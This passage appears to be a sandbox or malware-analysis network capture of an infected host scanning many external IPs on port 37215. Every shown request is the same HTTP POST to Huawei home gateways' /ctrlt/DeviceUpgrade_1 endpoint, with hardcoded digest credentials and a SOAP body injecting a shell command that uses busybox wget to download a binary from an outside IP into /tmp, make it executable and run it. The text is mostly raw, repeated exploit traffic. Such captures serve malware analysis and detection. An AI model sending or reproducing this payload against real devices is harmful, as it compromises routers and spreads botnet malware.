                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            739192.168.2.154504641.227.179.2237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.163177967 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            740192.168.2.154742041.200.94.20837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.163187027 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            741192.168.2.155486441.4.20.4737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.163232088 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            742192.168.2.153995841.237.162.18037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.163264990 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            743192.168.2.155577441.47.107.7037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739132881 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            744192.168.2.153777841.144.164.1937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739135027 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            745192.168.2.153552041.154.196.1337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739159107 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            746192.168.2.154196241.15.152.22937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739183903 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            747192.168.2.154921641.109.109.8337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739198923 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            748192.168.2.155045641.141.116.18437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739231110 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
